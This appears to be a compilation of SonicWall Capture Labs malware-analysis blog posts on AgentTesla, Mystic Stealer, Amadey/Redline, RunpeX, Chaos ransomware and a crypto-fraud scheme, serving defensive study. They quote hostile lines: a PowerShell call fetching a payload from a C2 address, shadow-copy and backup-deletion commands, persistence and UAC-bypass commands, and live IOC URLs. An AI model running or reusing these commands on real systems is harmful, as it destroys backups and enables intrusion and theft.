AgentTesla Updates Its Infection Chain

The SonicWall Capture Labs Threat Research team has observed AgentTesla infostealer being deployed using image(.jpg) files for last few months. We have observed multiple ZIP files with titles in European languages. Different IPs were seen targeting European nations with AgentTesla stealer and other bots having a wide variety of capabilities.
Infection_Chain

Figure 1: Infection Chain

The initial infection vector is an email with a ZIP file as an attachment. Inside the ZIP file there is a VBS script which is highly obfuscated, needing some heavy de-obfuscation to extract the next stage. The VBS on execution decodes the PowerShell code below:
2_Powershell

Figure 2: PowerShell Script

This PowerShell then downloads an image file Rump_vbs.jpg from the URL: "hxxps://uploaddeimagens[.]com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937".
3_PayloadImageFig_1

Figure 3: Image file embedded with DLL

The PowerShell retrieves a base64 encoded DotNet DLL file from the image file which is embedded between marker tags "BASE64_START" and "BASE64_END". This data is decoded and the DotNet assembly is then loaded into memory.

4_Image_Marker_tags

Figure 4: Image marker tags

After that, the PowerShell loads decoded Fiber.dll, which has the method "VAI" downloading and executing base64 encoded DotNet executable from the URL: "hxxp://79.110.48[.]52/kenjkt.txt".

This is done using: "$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.tkjnek/25.84.011[.]97//:ptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))".

The downloaded Fiber.dll is again a heavily obfuscated DotNet assembly and has obfuscated API strings for process injection. Although it has a number of methods, a majority of the methods inside the file have junk code.

5_ProcessInjection_APIs

Figure 5: Obfuscated API names for Process Injection

AgentTesla

For a long time, AgentTesla has been known for its wide variety of stealing and logging capabilities.
The txt file hosted on URL "hxxp://79.110.48[.]52/kenjkt.txt" has base64 encoded data. The decoded DotNet executable is the AgentTesla Payload. First, it enumerates for all of the Chromium-based and Mozilla-based browsers for the sensitive data they store.

ChromiumBased_Browsers

Figure 6: Chromium-based browser's data

Next, it appears that the malware has methods to search for Mozilla login data including the username and passwords in the victim's machine.
7_Mozilla_Data

Figure 7: Mozilla logins

Furthermore, it has functionality to retrieve sensitive credentials stored using Windows Vault GUIDs.
8_WinCredGUIDs

Figure 8: Win Vault GUIDS

AgentTesla does have keyboard hooking, clipboard hooking and logging functionality. Additionally, it has multiple APIs to retrieve keyboard layout and other details as well as information related to Windows and other system information.
1_WindowAPIs_Stealer

Figure 9: System information APIs

The stealer also has a list of sensitive strings or smart words, which contain a number of words leading to the private and sensitive information of an individual. In addition to this, it also checks for different email software, other common software for DB management and FTP connection and a few more well-known software.

10_TelegramBot

Figure 10: SmartWords and Telegram bot

Further, the data is exfiltrated via a telegram bot.

Evidence of detection by SonicWall's RTDMI ™ engine can be seen below in the Capture ATP report for this file:
11_CaptureATP

Figure 11: RTDMI ATP report results

IOCs:
SHA:
9346658f9a881fa08edcf2d4071ae99f71ada25fbdcad0eaf7dfb204c5867a0d
0f6b26bc3cad49b68ab669c5d9def97db345f6c23b8d0ee9cff48262c2db0743
60304a8c52b10cd71bcc76f8a3ad0f0bbfe7395d2c64833400ac06d3c2c81d58
01ec36cf3833166dbad8aeef0c5683905b31956a5d5367ac52fa7aee2be9c64e

URLs:

hxxp://79.110.48[.]52/kenjkt.txt
hxxps://uploaddeimagens.com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937

November 9, 2023/by Jayesh Kulkarni

infostealer, malware

Mystic Stealer Uses Trickery To Steal Data

This week, the SonicWall Capture Labs Research Team looked at a sample of Mystic Stealer. This is an infostealer that first appeared earlier in 2023. It has a variety of defensive techniques to evade detection and hamper analysis, and is coded to steal a variety of information (including Steam credentials). Mystic uses geolocation, installed languages, and local time to ensure the malware is on a viable victim system.

Static Analysis

The main sample (md5:b8afb88f471cf88b67db6a39ff4053e3) has several points to note. In Figure 1, there is no packer or protector listed in the initial detection; however, the creation timestamp is very recent. There are two atypical sections listed: .inter and .00cfg (Figure 2). There is also a unique .pdb file referenced in Figure 3.

Figure 1: Initial sample detection

Figure 2: Abnormal PE file sections

Figure 3: Timestamp for the debugger is extremely recent

Looking at the file in a debugger, it is immediately apparent that this program was created to hamper analysis (Figure 4). Every single step immediately preceding the entry point is a jump to a function that will perform multiple checks against the system. These include:

Location: GetLocaleInfoW, IsValidLocaleName, GetUserDefaultLCID, LCIDToLocaleName, GetSystemTimeAsFileTime, EnumSystemsLocaleW
Virtual Machine/Debugger: IsProcesserFeaturePresent, IsDebuggerPresent,OutputDebugString, QueryPerformanceCounter, QueryPerformanceFrequency, GetProcessHeap, GetCurrentProcessId, GetCurrentThreadId

Figure 4: Obfuscation by jump instructions

Within many functions, 'call-push-ret' is being used as a way of indirectly using system API calls (Figure 5). Once the locale check has been cleared, only debug and VM checks are performed intermittently.

Figure 5: A known method of obfuscation is using 'call-push-ret'

The program is also capable of setting its own sleep and wake conditions as shown in Figure 6, further enabling the malware to evade system defenses.

Figure 6: Dynamic sleep conditions and virtual machine checks

Dynamic Analysis

Running the sample without any patching results in an immediate error and the program terminates. The first round of checks to bypass are location and debugging protections, followed by intermittent virtual machine checks. At this point, the file will access the '.inter' section at memory location 0xD80000. Manually running the next function will create a new PE file in the newly available space, as seen below in Figure 7.

Figure 7: A new executable is written to the '.inter' section

Once this new program has been written, the command to run 'AppLaunch' is written to memory and executed (Figure 8). AppLaunch is a .NET application that is used by the malware for process injection.

Figure 8: The command 'C:\Windows\Microsoft .NET\Framework\v4.0.30319\AppLaunch.exe' is written immediately before launch

Once AppLaunch runs and the payload is injected, enumeration of the system will occur as well as an initial attempt to send data to the C2 server. Pulling strings from runtime memory of 'AppLaunch' shows that the injected payload is looking for analysis software.

Figure 9: Strings for known analysis tools IDA, Scylla, Immunity, x32/64dbg

A file is written to '~\AppData\Local\Temp' as seen below in Figure 10. The name is hard-coded (4375vtb45tv8225nv4285n2.txt), and subsequent runs will create a file with the same name.

Figure 10: A file is written to '~\AppData\Local\Temp' when malware is successfully run

The contents of the file show an IP address that is unsuccessfully contacted (Figure 11). This happens regardless of network connectivity, which means at the present time the IP is down or is not accepting communications. This IP is based out of Russia (Figure 12).

Figure 11: Log contents from written temp file

Figure 12: IP data

A packet capture shows what was sent to the malicious IP. The data is base64 encoded but contains basic information about the system. A partial capture is below in Figure 13.

Figure 13: The ASCII plaintext has a 'hwid' indicating the encoded system name

The full decoded message reads:

Sent system information
computername
SOFTWARE\Microsoft\Windows NT\CurrentVersion
UserName:
ScreenSize:
Current language:
Operation System:
Hardwares:
IP: {ip}
File Location:
Available KeyboardLayouts:
ProductName
SystemInformation.txt
Country: {country}
Location: {location}
Zip code: {zipcode}
TimeZone: {timezone}
HWID

Extracting the injected payload from memory, it is another PE file that has no import or export table, no listed functions, and the debug timestamp is set in the future (Dec 3, 2023) as seen in Figure 14. There are a handful of plaintext strings that show some capabilities in Figure 14 but, given that the import table doesn't (visibly) exist, it is difficult to determine exact functions.

Figure 14: The payload has no visible imports, exports, or functions. The debug timestamp is also from the future.

The listed strings show that the program can enumerate through files and running processes, but there are no file paths or application names found.

Figure 15: Visible strings give an idea of capabilities

In a debugger, the payload has functions to not only continuously check the system for analysis tools but will also terminate if any number of them fail (Figure 16). Each function also has the same set of of referenced items 'LdrpInitializeProcess' and 'minkernel\\ntdll\\ldrinit.c'. After bypassing these evasion checks, several decoding functions were found.

Figure 16: Each green arrow represents a decision tree where the program can terminate

Using several methods to decode the data resulted in a complete dump of all commands. Figure 17 has a partial listing of what is enumerated by the malware, with a complete listing below.

Figure 17: Partial list of decoded commands

Dynamic imports (decoded):

Ole32.dll
User32.dll
Ntdll.dll
Gdi32.dll
Wininet.dll
Crypt32.dll
Gdiplus.dll
Shlwapi.dll
Kernel32.dll
Advapi32.dll
Rstrtmgr.dll

Data marked for extraction:

Chromium-based browsers
Chromium browser extensions
Chromium wallets
Gecko-based browser data
Gecko browser extensions
Web history
Saved credit card data
Autofill information
Cookies (chromium, mozilla)
Saved logins
Steam installation data
Telegram
Outlook (SMTP, POP, IMAP, HTTP credentials and addresses)
User tokens
Screenshots are taken during enumeration

Mystic creates persistence with a scheduled task using the command '/c schtasks /create /F /sc minute /mo 15 /tr "%ls" /tn "\WindowsAppPool\%ls"'.

Mystic Stealer is highly evasive and can easily exfiltrate a large amount of data very quickly. These samples are detected by the following signatures: MysticStealer.Dropper, MysticStealer.Payload

IOCs

Main sample
md5: b8afb88f471cf88b67db6a39ff4053e3
sha1: 1c3c992f74a7905af067ef49657537e71be67413
sha256: 6ba71b02669ff6b6e939e334fd5b2aa907bfd3f54215c19df094be1cd5b948f8

Payload
md5: 4DF77A52DCE196CD2B3EE22A4E5A10B4
sha1: A9EB223D5A63592470723379CD975720895BEA47
sha256: BBDFF99D02941D59512389B4D6A43B0A23AF799A270204A6FF925BE550078A42

IP
hxxp://5.42.92[.]211/loghub/master

Mutex
\Sessions\1\BaseNamedObjects\Global\bbf55406-3d8f-4afd-a2ba-a73b2d5c73b4

October 16, 2023/by SonicWall Staff

infostealer, malware

Amadey & Redline Are Still Going Strong

This week, the SonicWall Capture Labs Threat Research Team has observed the following threat:

The Amadey botnet malware has been packaged with a Redline infostealer to infiltrate systems, extract a variety information, and enable control via a C2 server. Both of these malware families are Russian in origin and can be found on darknet markets, with purchase prices between $100-500 USD. These malware samples acting in tandem could compromise user accounts and passwords for the infected system as well as online accounts, cryptocurrency wallets, and other sensitive information.

Static Analysis

Identifying the parent file (6f47b64e9fd997e45e2f13fc93a4aa24acefdb763096aa1636c05c0520d7ccbf) using Detect It Easy shows that it is an cabinet installer (Figure 1) and does not give any indication of packers or encryption.

Figure 1: Initial sample detection

Unpacking the parent archive gives five separate files:

9a6ef1a115b9367809c7e5533fec7b462a9f56570b318b492b85f56d86dad9db (32bit .NET DLL)
c7eefb8ad88563225d2f6dbf8c172b8f9c762d4568165e7dda0cf5fe99d37bad (32bit .NET EXE)
3169784f33db3ef9f601721690e712e7397fdfcb62a7f8fe9c991aa5d74bb93e (32bit EXE)
73bf27825701303fbb23daf35fb053f4fbd2f788f833d13f3a695ea0b9dc78cd (32bit .NET EXE)
59e62d21e9db964ff3d98c7b8be190584754c87d1bbde2dea80c7e9b27b14ed0 (32bit EXE)

Of these files, there are two that automatically have suspicious characteristics: c7e and 73b are both timestomped, showing a creation timestamp in the future (Figure 2). 73b is also identified as having Confuser Ex obfuscation (Figure 3), which hinders analysis to a high degree.

Figure 2: Timestamps showing file creation in the year 2090

Figure 3: A creation date of 2067; Confuser Ex is an open-source protection software for .NET software

Looking through strings, file 316 has a reference to an Amadey.pdb file (Figure 4) within the debug strings; this is a custom debug file that loads symbols (resources or filepaths) as an alternative what may be in the finished program. The API calls that are listed show capabilities in Figure 5 cover the following areas: networking, system enumeration (to include registry, accounts, files, programs, and running processes), process injection, data manipulation, and security. The accompanying files also assist in network connections and enumeration with the exception of 9a6; this is a small .DLL file (~2kb) that is used for process side-loading.

Figure 4: String reference to Amadey

Figure 5: API calls within Amadey that confirm some of the malware functionality

Amadey has multiple methods of evasion for both runtime and analysis. This includes but is not limited to: sleeping for long periods, virtual machine and debugger detection (IsDebuggerPresent, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcess), and obfuscation. Removing ConfuserEx from the Redline sample shows the capabilities of what the file is doing. The file is named 'Doggeries.exe', and has a large number of functions for both parsing data and communication, as seen below in Figure 6.

Figure 6: Redline deobfuscated, showing a method of communication via email

Dynamic Analysis

Running the main application, files are dropped into the following locations and automatically renamed:

"~\Desktop\v5f6rvVc7A.exe"
"~\AppData\Local\Temp\IXP000.TMP\"
- j3346492.exe
- x3075787.exe
"~\AppData\Local\Temp\IXP001.TMP\"
- - i8210436.exe
- x0248748.exe
"~\AppData\Local\Temp\IXP002.TMP\"
- h8899948.exe
- g3601528.exe
"~\AppData\Local\Temp\925e7e99c5\"
- pdates.exe
"~\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll"

Once the files are dropped, persistence is created during the following steps:

'schtasks.exe' is run by 'pdates.exe' with the following command, which will run 'pdates.exe' once every minute:

'"System32\schtasks[.]exe" //Create //SC MINUTE //MO 1 //TN pdates[.]exe /TR "~\925e7e99c5\pdates[.]exe" /F'

'cacls' (Windows Access Control List) is used to set permissions on both the file and the directory to prevent runtime issues:

'"System32\cmd[.]exe" /k echo Y|CACLS "pdates[.]exe" /P "user:N" (&&) CACLS "pdates[.]exe" /P "user:R" /E (&&) echo Y|CACLS "..\925e7e99c5" /P "user:N" (&&) CACLS "..\925e7e99c5" /P "user:R" /E (&&) Exit'

A Windows registry key is changed to the following value to autostart when the system boots:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders: ~\AppData\Local\Temp\925e7e99c5\

As this is occurring, another file is run named 'Healer.exe' (it will have a randomized name when dropped). The only function 'Healer' has is to disable Windows Defender and prevent it from updating, as seen below in Figure 7.

Figure 7: Healer's functions and targeted registry keys

After 'Healer' has been run, 'pdates.exe' will reach out to the C2 and download 'clip64.dll' (Figure 8).

Figure 8: Communication is established, followed by 'clip64.dll' downloading

Clip64 is used to pull data from the clipboard and package it to be sent back to the C2. There is also a reference to Amadey in a .pdb path within the file (Figure 9).

Figure 9: Amadey Clipperdll.pdb reference (left), and clip64.dll capabilities (right)

An additional module named 'cred64.dll' also attempts to download, but is unsuccessful (Figure 10). It is unknown whether this is deliberate or accidental on the botnet operator's part.

Figure 10: The file 'cred64.dll' failed to download to the target system

A hook is installed using DirectDrawCreateEx to capture user input and activity. Amadey and Redline will enumerate the system in its entirety to collect hardware specifications, OS version, user accounts, installed software, credentials (in- and out of browser), documents, and cryptocurrency wallet information (Figure 11).

Figure 11: C2 and cryptocurrency information

Amadey and Redline are detected by RTDMS and the signature Amadey.R(Trojan).

IOCs

Hashes
6f47b64e9fd997e45e2f13fc93a4aa24acefdb763096aa1636c05c0520d7ccbf (parent file)
9a6ef1a115b9367809c7e5533fec7b462a9f56570b318b492b85f56d86dad9db (exhalhENZZbhvzCCmysGrfFiklOcA.dll)
c7eefb8ad88563225d2f6dbf8c172b8f9c762d4568165e7dda0cf5fe99d37bad
3169784f33db3ef9f601721690e712e7397fdfcb62a7f8fe9c991aa5d74bb93e (Amadey payload)
73bf27825701303fbb23daf35fb053f4fbd2f788f833d13f3a695ea0b9dc78cd (Redline payload)
59e62d21e9db964ff3d98c7b8be190584754c87d1bbde2dea80c7e9b27b14ed0
2244b4dc9afc6cfab7ef1dea92420e2acd275bac7349b929a69f3c1ae25f5e2f (pdate.exe)
58b02c8b4bc2bf7f5f1e8e45d7c206956f188ae56b648922ca75987b999db503 (clip64.dll)

URLs
77.91.68[.]61/rock/index.php
77.91.68[.]61/Plugins/cred64.dll
77.91.68[.]61/Plugins/clip64.dll
77.91.68[.]61/new/foto4060.exe
77.91.68[.]61/smo/du.exe

August 25, 2023/by

infostealer, malware

RunpeX Abuses Legitimate AntiMalware Driver

SonicWall Capture Labs Research team has observed RunpeX is abusing vulnerable version of kernel driver belonging to Zemana AntiMalware. RunpeX is a protector and malware injector based on KoiVM .NET protector. RunpeX is widely used to deliver different malware families like Remcos, Formbook, AgentTesla, Redline, Vidar, etc. The legitimate driver dropped by RunpeX is used to kill/disable AV/EDR processes which are generally protected. This technique is also known as Bring Your Own Vulnerable Driver (BYOVD). Previously, this technique has been employed by APT groups, AV/EDR killer tools, and ransomware actors.

Layer 1:

First-stage loader is .net application, which contains encrypted second stage payload hardcoded in byte array. This byte array is decrypted and executed using Assembly.Load() method.

Figure 1: Byte array contains encrypted second-stage loader and InvokeMethod() function

Before executing second stage payload, function named "Do()" is called to bypass AMSI detection by patching AmsiScanBuffer() function.

Figure 2: Function to bypass AMSI

Layer 2:

Second-stage loader is .net RunpeX, which is protected with customized KoiVM virtualizer. This payload is responsible for installing Zemana AntiMalware driver.

Figure 3: Decompiled code of second-stage payload

In order to disable security solutions, this second stage payload drops and install Zemana driver. The driver is dropped at the root of “c” drive with name "Zemana.sys” and is signed by “Zemana Ltd.”

Figure 4: Driver is signed by “Zemana Ltd"

To install driver on system, RunpeX elevate privileges using CMSTP UAC bypass technique. Below command is executed to achieve privilege escalation:

"c:\windows\system32\cmstp.exe /au C:\windows\temp\1brdhu0p.inf"

Figure 5: Privilege escalation and UAC bypass using cmstp.exe

The INF file used in this UAC bypass is similar to the file present on GitHub.

Figure 6: Content of inf file

In the next step, driver service is created with name “Zemana” to load driver.

Figure 7: Service named “Zemana” is created to load driver

Then it retrieves handle to the loaded driver using CreateFileA() function:

Figure 8: Code snippet to retrieve driver handle

Using the handle created in the above step, RunpeX sends IOCTL code 0x80002010 to register itself as a trusted process by the driver.

Figure 9: IOCTL used to add process in trusted list

Finally, RunpeX sends another IOCTL code 0x80002048 to terminate target process by passing process PID as parameter. Using this IOCTL, it terminates all processes which are present in the configuration list.

Figure 10: IOCTL used to terminate security software processes

Driver IOCTL functionality

Below figure shows IOCTL handler functions that are part of installed driver:

Figure 11: Driver function to handle IOCTLs

Indicators Of Compromise (IOCs):

2d3c9078e40a6dd286b36dbaaf1f0a367d22a0f9e30a2fc93d1d8ba5b9b97ce8 - Initial Payload (.Net Application)

SonicWall Capture Labs provides protection against this threat via the following signature:

Injector.RPX (Trojan)

August 11, 2023/by

infostealer, malware, news, ransomware

A new variant from Chaos Ransomware family surfaces

The SonicWall Capture Labs Research team has received a sample of a new variant from Chaos Ransomware family which is a customizable ransomware builder that emerged in underground forums, by falsely marketing itself as the .NET version of Ryuk.

It provided the following customizable options which a cybercriminal can use to customize a ransomware.

processName = "svchost.exe";
sleepTextbox = 10;
spreadName = "surprise.exe";
userDir = "C:\\Users\\";
checkAdminPrivilage = true;
checkCopyRoaming = true;
checkdeleteBackupCatalog = true;
checkdeleteShadowCopies = true;
checkdisableRecoveryMode = true;
checkSleep = false;
checkSpread = true;
checkStartupFolder = true;
droppedMessageTextbox = "read_it.txt";
encryptedFileExtension = "";
encryptionAesRsa = true;
messages = new string[]; #Ransomware message content

Infection Cycle:

At the start of the execution it checks its own filename and the location from where it is running.

If the process name and the location name is not %appdata%\\svchost.exe, it drops a copy of itself to %appdata%\\svchost.exe and launches it.

After that it checks for the "checkSleep" variable which is provided at the time of building ransomware, if the value is False is will skip executing the sleepOutOfTempFolder(), function which also checks the folder location form where it is running and if the path does not matches, it uses another count variable "sleepTextbox" whose value is multiplied by 1000 times and resulting value is passed to thread and sleeps for that many milliseconds.

It then checks for the checkStartupFolder flag and if its true it calls addLinkToStartup() function.

It creates a file svchost.url in which it adds the location of the file and copy the file into User Startup folder to
enable its automatic execution at every system startup

It has a hardcoded list of directories and files with valid extension in those directories are only encrypted.

List of the extension

Before encrypting the file it checks for the list of valid file extensions and the filename should not be one in the droppedMessageTextbox supplied at the time of building the ransomware.

This droppedMessageTextbox contains the name of the file which contains the ransomware message.
In our case the filename is "read_it.txt";

Before encrypting the file it checks for the File length.
If the file length is below 2,117,152 bytes, it encrypts the file using EncryptFile method and if the size is bigger than
2,117,152 bytes a random string of a random length between 200000000 and 300000000 bytes is generated and encoded using the randomEncode method.

It creates a 20 byte random password and converts the password to a byte array using UTF8 encoding.
The content of the file is then AES encrypted using that key.
It then encrypts the key generated earlier using the RSA encryption

AES encrypted content are again converted into Base64 encoding.

It then concat the RSAEncrypted key and base64 encoded content into the file using File.WriteAllText method.

Finally, original file is moved to same location by appending a random extension using the RandomStringForExtension method.
It then drops the "read_it.txt" containing the ransomware message on that location.

Once the encryption is done it delete Shadow Copies, disable Recovery Mode and delete Backup Catalog file using below commands.

"vssadmin delete shadows /all /quiet & wmic shadowcopy delete"
"bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"
"wbadmin delete catalog -quiet"

In order or spread, it loops through all the available drives on the system and if the drive is not a C:\ drive and the spreadName file is not present on the system, It copies the malware’s file to that drive with the specified spreadName.

This way the malware can potentially infect other machines whose drives are mapped onto the victim's machine.

Once the encryption is completed it displays the ransomware message text.

It set the below wallpaper

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV:MalAgent.RSM_99 (Ransomware)

August 1, 2023/by

infostealer

Agent Tesla RAT Disguised As NSIS Installer

Overview

The SonicWall Capture Labs Research team recently observed an Agent Tesla malware that is being loaded using Native Loader. Agent Tesla is an advanced Remote Access Trojan (RAT) developed using Microsoft .Net framework capable of stealing sensitive information. It has been one of the most prevalent malware families from the past couple of years.

In this blog post, we will discuss.

Capabilities of Agent Tesla with complete catalog of targeted software.
Understanding how Native Loader is used to load Agent Tesla.
Evolution of Agent Tesla’s String Decryption Algorithm.
Approach for Automatic String Decryption.

Introduction

Agent Tesla malware first appeared in 2014 has been active for over last nine years and it is constantly being updated by its threat actor by adding new capabilities. Agent tesla’s main objective consists of credential stealing, keylogging, screen capture, clipboard capture, stealing victims’ application data and send it to threat actor.

Infection Cycle

Agent Tesla is mainly delivered though phishing emails.

Fig 1. Infection Cycle

Unpacking of AgentTesla

Recent variant of Agent Tesla is being distributed as NSIS Installer consisting of NSIS script, DLL plugin and encrypted payload’s file.

Fig 2. Extracted Files of NSIS installer

Layer 1 – Plugin DLL

NSIS-plugin DLL calls its the exported function “HvDeclY” which decrypts the layer 2 shellcode.

Layer 2 – Shellcode

API HASHING

Shellcode uses API Hashing to obfuscate API calls.

Fig 3. Custom API Hashing Algorithm

ANTI-EMULATION

Shellcode crash itself by jumping to invalid address when dwNumberOfProcessors < 1 or VirtualAllocExNuma API not able to allocates memory.

Shellcode has an Anti-Emulation check – It allocates the 381 MB of memory space, set each byte to 0 and free that memory space.

On 64-bit system, Shellcode uses heaven’s gate technique to avoid analysis by debugger.

Fig 4. Heaven’s Gate call

PROCESS HOLLOWING

On 64-bit system Shellcode executes some API’s using Syscall instruction that are used for Process Hollowing. On 32-bit same APIs are using Sysenter instruction.

Fig 5. 64-bit Code, Syscall through Heaven’s Gate

This layer serves as loader to begin the execution of native loader.

Native Loader

Layer 2 shellcode decrypts an encrypted native C++ loader and start its execution. This Agent Tesla variant has a noteworthy difference from previously examined variants, in this variant Agent Tesla is loaded via a native C++ loader instead of multiple stages of .net assembly modules.

Native loader stores the final payload Agent Tesla in its resource’s directory. The Common Language Runtime is integrated by the loader via CLR Hosting Interfaces in order to load and run .Net assemblies. Mscoree DLL implements functions that is used for CLR hosting.

Fig 6. API’s call sequence to load .Net managed assembly from unmanaged code.

This native loader injects the final Agent Tesla payload in newly created process and start its execution.

Technical Analysis of Agent Tesla

Capabilities of Agent Tesla

This recent version of Agent Tesla harvest variety of sensitive data from a wide selection of browsers, VPN, FTP , Email clients and more. Sensitive data of the application includes its credentials, “\user data” directory of particular browser, Cookies from browser and FTP application, Configuration data.

Data Harvesting
- Browsers: IE/Edge, UC Browser, Safari for Windows, QQ Browser, Falkon Browser, Flock Browser, Opera Browser, Yandex Browser, Iridium Browser, Chromium, 7 Star, Torch Browser, Cool Novo, Chrome Plus, Kometa, Amigo, Brave, Cent Browser, Chedot, Orbitum, Sputnik, Comodo Dragon, Vivaldi, Citrio, 360 Browser, Uran, Liebao Browser, Elements Browser, Epic Privacy, Cốc Cốc browser, Sleipnir 6, QIP Surf, Coowon, Google Chrome, Edge Chromium, Firefox, SeaMonkey, BlackHawk , CyberFox, K-Meleon, IceCat, Pale Moon, IceDragon, WaterFox, Postbox
- Email clients: Eudora, The Bat, Becky, Outlook, Windows Mail App, FoxMail, Opera Mail, PocoMail, eM Client, Mailbird, Thunderbird, Claws, IncrediMail.
- FTP/SCP clients: FileZilla, CoreFTP, WinSCP, Flash FXP, FTP Navigator, SmartFTP, WS_FTP, FtpCommander, FTPGetter.
- Databases: Berkelet DB, MySQL Workbench.
- VPN clients: NordVPN, OpenVPN, Private Internet Access VPN.
- Virtual network computing clients: RealVNC, WinVNC3, TightVNC, UltraVNC.
- Instant Messaging programs: Discord, Paltalk, Pidgin, Psi/Psi+, Trillian
- Dynamic DNS clients: DynDns
- Download Managers: JDownloader, Internet Downloader Manager
- Windows Credentials: Windows Secure Note, Windows Web Password Credential, Windows Credential Picker Protector, Web Credentials, Windows Credentials, Windows Domain Certificate Credential, Windows Domain Password Credential, Windows Extended Credential
Keystrokes logging
Clipboard Scraping
Screenshot Capturing
Deleting Zone identifier
- Agent Tesla deletes Zone Identifer to remove its trace that origin of file is untrusted source.
  Fig 7. Deleting Zone identifier

Fingerprinting

Agent Tesla uses Computer name, Operating System , Processor name, Total memory, Current date and time , IP Address, Internet connectivity and Username, MacAddress, Serial Number for fingerprinting.

Persistence

Agent Tesla achieves persistence by adding two autorun registry keys.

Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run

Exfiltration

Normally Agent Tesla exfiltrate collected data via FTP, HTTP, SMTP and Telegram bot, but in this variant it only uses SMTP to exfiltrate data.

Malware uses compromised email account to exfiltrate collected data to mail server which is being managed by the attacker.

The above discussed techniques are similar in most of the .Net stealers. The SonicWall research team has provided a full explanation for above techniques in Unmasking .Net Stealer and Redline blog posts.

Configuration Data

Agent Tesla keeps its configuration data encoded.

Fig 8. Agent Tesla's Decoded Configuration Data

Evolution of String decryption Algorithm

In this section we will discuss the evolution of string decryption algorithms of Agent Tesla.

Agent Tesla is actively changing its tactics to hide from security software’s. One of the tactics is string encryption, it is crucial to keep them hidden from security software and reverser's. All the important configuration data and ioc’s such as browser names list, c2 host name, smtp credentials in Agent Tesla are stored as encrypted strings.

Version 1

In this version encrypted strings are stored as base64 encoded.

The SHA1 hashing algorithm is used by decryption function “s_method_0” to generate a key using a hardcoded password and salt. The base64 decoded string is then decrypted with the AES algorithm using CBC mode using the generated key and hardcoded IV.

Fig 9. AES Decryption Function(bottom), example of encrypted string(top)

Version 2

In this version Agent Tesla uses AES algorithm in CBC mode same as in version 1 but it uses different Key and IV for each decryption the string. Strings are stored in an array of object, where each object has three elements that are an encrypted string, Key and IV.

Fig 10. AES Decryption Function(bottom), example of encrypted string(top)

Version 3

In this version Agent Tesla implements simple Xor decryption. Xored strings are stored in array of bytes.

Decryption function is defined in .cctor() constructor of binary file. When malware starts its execution, its constructor gets called automatically and it decrypts an encrypted string array using hardcoded Xor byte-size key. To locate an exact string malware uses array offset and size of string as there is no separator between strings.

Fig 11. Simple Xor decryption(bottom), example of encrypted string(top)

Version 4

In this version Agent Tesla author has copied and abused an open-source .NET string encryption tool XorStringsNET .

In this version strings are stored as encrypted data blob. Data blob has below format.

As per .NET file format data blob is stored as field of structure as shown below.

Fig 12. Data blob stored as structure with size of =19953 bytes

Approach for string decryption

1) We can use de4dot tool to automatically decrypt the strings and get binary file with strings are decrypted. It comes with multiple options to manipulate the .Net binary file.

Consider below command as example to decrypt the strings.

de4dot.exe -f file -o outfile --strtyp delegate --strtok 0x6000001

strtok – Enter the method token of the Decryption method. We can get it easily using DnSpy.

Fig 13. de4dot cmdline options

strtyp – This option can be one of the below methods.

Fig 14. String decrypter type available

2) Python Scripts by parsing .Net metadata.

Writing python script to decrypt strings automatically, we need to find required data as below.

.Net metadata – Parse required metadata such as Method/Structure Token, RVA, File offset required for string decryption.

Many open source .Net parsing libraries are available on Github.

Conclusion

Agent Tesla RAT has been active from several years and it is continuing to evolve. It has developed new ways such as use of native C++ loader for evading detection. Agent Tesla is successfully able to harvest and exfiltrate data to the attacker. In each version Agent Tesla continues to improve its string encryption functions and addition into its data stealing capability catalog . We expect major improvements in the next version of it.

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: AgentTesla.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

IOC’s

D63FE952E90788072C6166A39BDE21B5 – NSIS Installer

B67E8512632AAE047A483B643EA6B1B4 – NSIS Plugin DLL

F8F2ED5A4E1FB2F14D49349CE4E2B779 – Encrypted Stage 2

57B264BF971F2BCF62140130CFD94CF5 – C++ Loader

A0A5B08B0EFFF9FAA96455B699893F76 – Agent Tesla

July 5, 2023/by

cryptominer, cryptostealer, infostealer, malware, news, spotlight

Google script being abused for Cryptocurrency fraud

SonicWall Capture Labs Research team has discovered an ongoing instance of cryptocurrency fraud that utilizes legitimate Google services, specifically Google Script macros. Threat actors intentionally target these platforms because they are both convenient to use and malicious code can evade detection by anti-malware systems.

Google Script macros are primarily designed to enhance productivity and streamline workflows within Google services. However, threat actors are now exploiting them for fraudulent purposes, finding ways to execute malicious code within the context of legitimate Google applications.

In this case, a PDF file is being circulated, containing a malicious URL that was created using Google Script. Once the user interacts with this URL, they are redirected to the actual fraudulent website.

Fig: PDF File

Below shown the response to the malicious URL using Google Script Macro.

Fig: Fiddler capture of malicious Google Script Macro

When the URL in the PDF file opens it shows Google’s message that this application was created by another user not by Google when clicked on the webpage it redirects to office[.]proprogramvipt[.]top

Fig: Google script malicious URL

After redirection, On this deceptive webpage, user is confronted with a warning message indicating that their account is at risk of deletion due to inactivity. To add a sense of urgency, a countdown timer is displayed, suggesting that the account will be deleted imminently.

In order to prevent the account deletion and purportedly withdraw the funds (which, in reality, are non-existent), user is instructed to sign in.

Fig: Warning for account deletion

Upon signing in, user is presented with a prepopulated sign-in page that appears legitimate. The page is carefully designed to create an enticing welcome-back message, which includes displaying the user's Bitcoin balance in both BTC and USD values. This serves as bait to lure user into continuing further with the process.

Fig: Sign-in & welcome message

To create an illusion of authenticity, various elements that mimic legitimate features commonly found on cryptocurrency platforms are presented. These elements include:

History: A fabricated transaction history is displayed, showcasing previous transactions to make the platform appear genuine.

User Chat: Fictitious comments and messages from fake users are shown, attempting to simulate user activity and engagement on the platform.

Settings: Users are provided with an option to collect bitcoins, along with the ability to change their password. This is aimed at giving the impression of user control and customization.

News: Fake news articles are presented, falsely claiming updates such as a switch to a new cryptocurrency system, the addition of PayPal payouts, or technical server-related updates. These news pieces aim to instill a sense of credibility and innovation.

